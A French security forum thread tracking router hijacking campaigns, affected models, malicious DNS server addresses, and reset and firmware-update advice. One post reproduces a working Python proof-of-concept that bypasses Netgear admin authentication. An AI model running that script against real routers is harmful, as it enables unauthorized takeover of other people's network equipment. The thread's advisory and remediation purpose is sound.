📌 Piratages de routeurs en hausse

L'actualité & News Informatique!
Donc pas de demande d'aide dans cette partie.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

📌 Piratages de routeurs en hausse

par Malekal_morte »

Voici une page qui parle des piratages de routeurs de plus en plus visés.
Cette page sera éditée selon les évènements.

Dernier Edit - 11/03/2019 : modifications de la présentation de l'article pour plus de clarté.

Le piratage de routeur
On reconnait le problème de la sécurité des infrastructures réseaux souvent oubliées - on en parlait .

L'exploitation peut-être réalisée depuis :
  • une vulnérabilité sur les routeurs (il faut mettre à jour le firmware du routeur)
  • une vulnérabilité connue mais qui ne sera jamais corrigée dû à l'obsolescence
  • un mot de passe par défaut ou trop faible sur les interfaces de gestion du routeur
  • une backdoor / une porte dérobée qui a été cachée par le constructeur du routeur
  • une configuration trop permissive ou un code qui abaisse le niveau de sécurité
Une prise de contrôle du routeur est alors possible (il devient un routeur zombie) et/ou les configurations DNS (serveurs de noms) du routeur peuvent être modifiées, ce qui permettra d'effectuer des redirections.

Ce blog décrit un exemple d'attaque : http://rootatnasro.wordpress.com/2014/0 ... e-network/
routeurs_hacks.png
Hijack DNS

Le terme "hijack" signifie détourner donc "hijacking" est un détournement. Une estimation en 2014 tendait à démontrer qu'environ 200 000 routeurs algériens vulnérables aux détournements.

Ces procédés de modifications des serveurs DNS/de noms ne sont pas nouveaux et sont pratiqués depuis plusieurs années.
A ce propos, vous pouvez lire la page : Trojan.DNSChanger.

Deux sujets plus classiques avec redirections sur des machines algériennes.
Notez que les configurations DNS des ordinateurs avaient aussi été modifiées.
Des publicités sur des pages Facebook/Google s'affichaient à l'écran des utilisateurs.
http://www.commentcamarche.net/forum/af ... debarasser
http://www.commentcamarche.net/forum/af ... ut-of-date

Code : Tout sélectionner

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 41.77.138.18 8.8.8.8 
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B784659B-49DA-4AE2-96A2-F74F97B326BC}: DhcpNameServer = 100.100.0.102 
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{FB792F37-0209-420A-B028-92EC1561AA02}: DhcpNameServer = 41.77.138.18 8.8.8.8
et :

Code : Tout sélectionner

nslookup http://www.google.fr /c >
Serveur : host-41.77.138.18.citynethost.com 
Address: 41.77.138.18 
DNS request timed out. 
timeout was 2 seconds. 
Le site ISMYDNSHIJACKED permet de tester ses DNS.
- http://forum.malekal.com/dnscheck-ismyd ... 51076.html

Image

Les détournements de l'interface de gestion ou bien les tentatives d'accès avec des mots de passe usuels ne sont pas nouveaux. Nous en parlions déjà fin 2008, du temps où Trojan.DNSChanger faisait rage...

Ces méthodes permettent donc de détourner du traffic pour par exemple effectuer toutes sortes d'attaques, comme par exemple faire des redirections vers de faux sites ou bien d'afficher des publicités, et plus insidieux, à des vols de cookies, d'identifiants, de formulaires, etc.

Le CERT Poleska a dernièrement émis une alerte sur des vols bancaires via ces détournements DNS. La nouvelle ayant été reprise par plusieurs médias comme le site de news TheHackerNews.
router-vulnerabilities-DNS-hijacking.png
Il y a peu d'informations concernant l'exploitation des vulnérabilités sur des box française, néanmoins, laissez le mot de passe par défaut n'est vraiment pas une bonne idée surtout lorsque l'on sait qu'une exploitation de ce genre est d'une simplification enfantine. Pensez donc à changer le mot de passe de votre box !


Conseils pour sécurise ses routeur et box internet

Prendre connaissance de la FAQ pour comprendre le fonctionnement d'un routeur.: Fonctionnement des routeurs et box internet
Pour sécuriser son routeur contre les attaques, piratage et intrusions, vous pouvez lire l'article : Comment sécuriser son routeur contre les piratages.

Réinitialiser d'usine

Lorsque le routeur a été piraté, vous devez réinitialiser d'usine ce dernier.
Cela supprime tous les logiciels malveillants et remets le routeur dès qu'il était à la sortie d'usine.
La procédure est différent selon le modèle de routeur ou le constructeur.

Voici la procédure à suivre :
  • Faire un "reset" (remise à zéro d'usine) du routeur. En général, se trouve un bouton sur lequel il faut appuyer pendant quelques secondes avec la mine d'un stylo par exemple.
    Image
    Image
    Image
  • Se connecter à l'interface WEB du routeur (ex : http://192.168.1.1/ ) et changez le mot de passe Administrateur.
  • Télécharger et installer le dernier firmware ( le micrologiciel du fabricant )
    En général, il faut se rendre sur le site du constructeur pour télécharger le dernier firmware.
    Ensuite se connecter à l'interface dans la partie "Mise à jour", un bouton "Parcourir" est disponible pour aller chercher le fichier du firmware téléchargé.
linksys-firmware-upgrade.jpg
Liste des aides de certains constructeurs: Exemple de piratage de routeurs

EDIT: 25.05.2014 : TD-W8901G impactés

Pas mal de routeurs TD-W8901G attaqués.


EDIT: 17.09.2014 : découverte d'un réseau de 400 000 routeurs infectés ?

Kaspersky Labs a publié une analyse rapide d'une attaque qui vise les pays de langue portugais. Un courriel avec un lien cliquable, si l'utilisateur clique il est alors redirigé vers un site et si le mot de passe du routeur est celui par défaut, le routeur est attaqué, le cas échéant une fenêtre d'authentification vous demande de saisir vos identifiants. Une évolution comparé à Carna botnet découvert en 2013 qui ciblait seulement les routeurs accessibles par identifiants "root/root" et "admin/admin".

Toujours en septembre 2014, le blog malwaremustdie revient sur une analyse de Linux/Elknot qui infecte les routeurs pour mener des attaques DoS.

Une autre analyse rapporte les vulnérabilités sur la plupart des routeurs grands publics.
SOHO_router_vuln.png

EDIT: 12.01.2015 : Le groupe "Lizard Squad" utilise un botnet de routeurs

Lire le bulletin d'information Lizard Squad dispose d'un botnet de routeurs


EDIT: 28.05.2015 : Le ver informatique Linux/Moose

Cette fois-ci, un ver s'attaque aux routeurs, il se propage par attaques en force bruie de l'authentification.

Lire le bulletin d'information Le ver informatique Linux/Moose aime vos routeurs.

EDIT: 08.10.2015 : Les routeurs Netgear touchés par une vulnérabilité

Sur la news de BleepingComputer, on apprend que certains routeurs Netgear possèdent une vulnérable à distance qui concerne l'authentification de l'administration à distance.

Les modèles Netgear sont :
* JNR1010v2
* JNR3000
* JWNR2000v5
* JWNR2010v5
* N300
* R3250
* WNR2020
* WNR614
* WNR618

Et les firmwares vulnérables sont :
* N300_1.1.0.31_1.0.1.img
* N300-1.1.0.28_1.0.1.img


10 000 routeurs aurait été touchés.
La vulnérabilité a été remontée à NetGear en Juillet et... toujours aucun correctif
Vous devez donc absolument désactiver l'authentification à distance à attendant un correctif.

Source : http://www.csnc.ch/misc/files/advisorie ... Bypass.txt
Netger_administration_distance.jpg
EDIT: 15025.02.2016 : RouterHunter pour trouver des routeurs non à jour

Pour les administrateurs, RouterHunter permet de scanner le réseau à la recherche de routeur ayant des vulnérabilités.
Routerhunter.png
EDIT: 01.2017 : D-Link attaqué aux USA par la FTC

D-Link attaqué aux USA pour des raisons de sécurité.
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Sality utilise Win32/RBrute pour accéder aux routeurs et changer les DNS.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Routeurs TP Link : TD-W8901G impactés, affichage de fausses pubs Java/Flash.

Quelques DNS :
* 23.253.94.129
* 40.20.1.201
* 40.20.1.202
* 178.33.118.171

Appuyer avec une épingle/stylo sur le bouton "reset" pendant quelques secondes.
Veiller à ne pas appuyer trop fort avec l'épingle au risque de perforer la membrane.
TD-W8901G-reset1.jpg
Reconfigurer ensuite les paramètres de sa connexion internet.
Veiller à changer les mots de passe par défaut du routeur.
Faire une mise à jour du dernier firmware TP Link
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Nouvelle campagne de détournements DNS sur IPs : 76.73.6.26 & 50.7.75.2
Les symptômes constatés sont des redirections vers le site indieposts.com
https://www.supprimer-virus.com/supprim ... posts-com/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Autre cas de routeur piraté avec symptômes de modifications des DNS
http://www.commentcamarche.net/forum/af ... pas-privee

L'internaute reçoit le message suivant à la visite de Google :
Votre connexion n'est pas privée

"Il se peut que des pirates soient en train d'essayer de dérober vos informations sur le site mail1.eccc.gov.kh (par exemple, des mots de passe, des messages ou des informations sur vos cartes de paiement)."
Cela vient du fait que lorsque l'ordinateur du réseau demande la résolution DNS pour l'adresse Google, une mauvaise adresse de serveur DNS est retournée.

Liste des réponses pour Google.fr
dhcp1.office1.digi.com.kh
173.194.127.111
173.194.127.119
173.194.127.120
173.194.127.127
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Nouvelle campagne de détournement de routeurs TP-LINK, les IPs sont:
209.244.0.3
195.238.181.164


Les symptômes constatés sont l'ouverture de popups pornographiques en langue russe.

Les adresses sont:
adultcameras.info
adultyum.info


http://www.supprimer-virus.com/adultcam ... ltyum-info
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
chef

Re: Hacks routeurs en hausse

par chef »

Bonjour,

Je me pose la question, nos routeurs fournis par nos FAI ( Orange, Free,..,) à part changer le mot de passe ?

Merci
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

En France, sur les routeurs / box des FAI, il n'y a pas à gérer les mises à jour.
Pour Livebox & Freebox, par exemple, c'est silencieux et automatique.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Avatar de l’utilisateur
devadip
Messages : 1087
Inscription : 25 févr. 2008 20:01

Re: Hacks routeurs en hausse

par devadip »

Bonjour,

J'ai cru comprendre que pour la Freebox V5, qu'il faut la débrancher (min 1 fois par mois) attendre quelques secondes et la rebrancher. Et faire de même avec la box internet et box TV.
chef

Re: Hacks routeurs en hausse

par chef »

Bonjour,

Pour la box internet, oui mais pour la TV, pourquoi ?
La box TV est déjà reliée à la box internet, non ?
Avatar de l’utilisateur
devadip
Messages : 1087
Inscription : 25 févr. 2008 20:01

Re: Hacks routeurs en hausse

par devadip »

Bonjour,

C'est exact, bonne question et je te remercie de me l'avoir posée.
Je suppose que c'est pour mettre la mise à jour "en marche"..
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Édité pour ajouter un paragraphe.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Les routeurs Belkin N600 DB Dual Band N+ modèle F9K1102 v2 avec firmware v2.10.17 et antérieurs présentent diverses vulnérabilités jugées sévères : CERT - Vulnerability Note VU#201168.
Pour le moment, il n'y a pas de correctifs disponibles.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Bulletin initial édité pour informer d'une vulnérabilité touchant les routeurs Netgear.

Code : Tout sélectionner

import os
import urllib2
import time
import sys

try:
	first = urllib2.urlopen("http://" + sys.argv[1])
	print "No password protection!"
except:
	print "Password protection detected!"
	print "Executing exploit..."
	for i in range(0,3):
		time.sleep(1)
		urllib2.urlopen("http://" + sys.argv[1] + "/BRS_netgear_success.html")

	second = urllib2.urlopen("http://" + sys.argv[1])
	if second.getcode() == 200:
		print "Bypass successfull. Now use your browser to have a look at the admin interface."
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: Hacks routeurs en hausse

par Malekal_morte »

Asus a été condamné par la commission de protection des consommateurs américains a une amende de 206 millions de dollars pour défaut de protections pour ses routeurs (environ 13 000). Il était possible de récupérer ou changer les paramètres des routeurs par une simple connexion USB. D'autres grands équipementiers n'ont pas été inquiétés pour les mêmes faits. On the road again..

https://www.ftc.gov/news-events/press-r ... rvices-put
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Actualité & News Informatique »